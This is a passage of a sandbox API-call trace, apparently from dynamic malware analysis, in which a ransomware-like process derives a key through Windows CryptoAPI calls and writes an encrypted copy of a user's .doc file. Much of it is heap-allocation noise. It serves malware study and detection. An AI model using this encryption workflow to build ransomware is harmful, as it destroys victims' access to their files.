lpString1="zi27.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.091] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0034.091] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0034.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oc", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="doc", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".doc", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0034.092] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x687e6f0, ftCreationTime.dwHighDateTime=0x1d5c14d, ftLastAccessTime.dwLowDateTime=0x802a9bb0, ftLastAccessTime.dwHighDateTime=0x1d5c300, ftLastWriteTime.dwLowDateTime=0x802a9bb0, ftLastWriteTime.dwHighDateTime=0x1d5c300, nFileSizeHigh=0x0, nFileSizeLow=0xbd3b, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="G_eLJ7pQzi27.doc", cAlternateFileName="G_ELJ7~1.DOC")) returned 0x7c2240 [0034.092] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0034.092] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0034.092] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.092] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0034.092] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0034.092] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.092] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.092] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0034.093] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0034.109] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0034.109] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0034.109] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0034.109] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.109] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0034.109] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.109] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0034.109] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.109] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0034.109] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0034.109] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.109] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.109] CryptHashData (hHash=0x7c2100, pbData=0x7c9758, dwDataLen=0x100, dwFlags=0x1) returned 1 [0034.109] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.109] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0034.109] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.109] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0034.109] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.110] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.110] CryptDestroyHash (hHash=0x7c2100) returned 1 [0034.110] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\g_elj7pqzi27.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0034.110] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0034.110] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0034.110] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0034.110] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0034.110] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0034.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0034.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0034.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0034.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0034.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0034.110] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.110] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0034.110] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0034.110] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0034.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0034.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0034.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0034.110] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0034.110] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0034.110] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.110] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0034.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0034.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0034.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0034.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0034.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0034.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0034.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0034.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0034.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0034.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0034.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0034.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0034.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0034.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0034.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0034.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0034.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0034.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0034.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0034.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0034.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0034.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0034.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0034.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0034.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0034.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0034.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0034.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xf0) returned 0x7c9758 [0034.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0034.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5758 [0034.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0034.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5810 [0034.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c9758 | out: hHeap=0x770000) returned 1 [0034.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0034.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0034.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0034.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0034.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0034.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5758 | out: hHeap=0x770000) returned 1 [0034.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0034.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0034.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0034.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc0) returned 0x7c9758 [0034.112] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k")) returned 0x10 [0034.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c9758 | out: hHeap=0x770000) returned 1 [0034.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0034.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5810 | out: hHeap=0x770000) returned 1 [0034.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0034.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0034.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0034.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0034.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0034.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0034.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0034.112] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.encrypted.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\g_elj7pqzi27.encrypted.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0034.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0034.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0034.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0034.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0034.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0034.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0034.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0034.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0034.113] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0034.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0034.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0034.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0034.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0034.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0034.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0034.113] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0034.113] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0034.113] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0034.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0034.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0034.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0034.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0034.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0034.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0034.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0034.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0034.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0034.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0034.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0034.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0034.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0034.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0034.114] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0034.114] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0xbd3b, lpOverlapped=0x0) returned 1 [0034.116] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0034.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0034.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0034.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0034.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0034.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xbd3b) returned 0x955018 [0034.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0034.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0034.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0034.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0034.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0034.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0034.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xbd3b) returned 0x960d60 [0034.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0034.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0034.118] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0034.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0034.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0034.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0034.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0034.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xbd3b) returned 0x955018 [0034.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0034.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0034.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0034.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0034.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0034.119] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0034.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0034.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0034.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0034.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0034.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0034.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0034.120] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0034.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0034.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0034.120] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0034.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0034.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0034.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da198 [0034.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0034.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0034.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0034.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0034.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xbd3b) returned 0x955018 [0034.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1b8 [0034.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0034.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0034.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0034.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da288 [0034.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0034.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0034.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0034.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da318 [0034.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0034.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0034.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0034.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc10 [0034.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0034.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 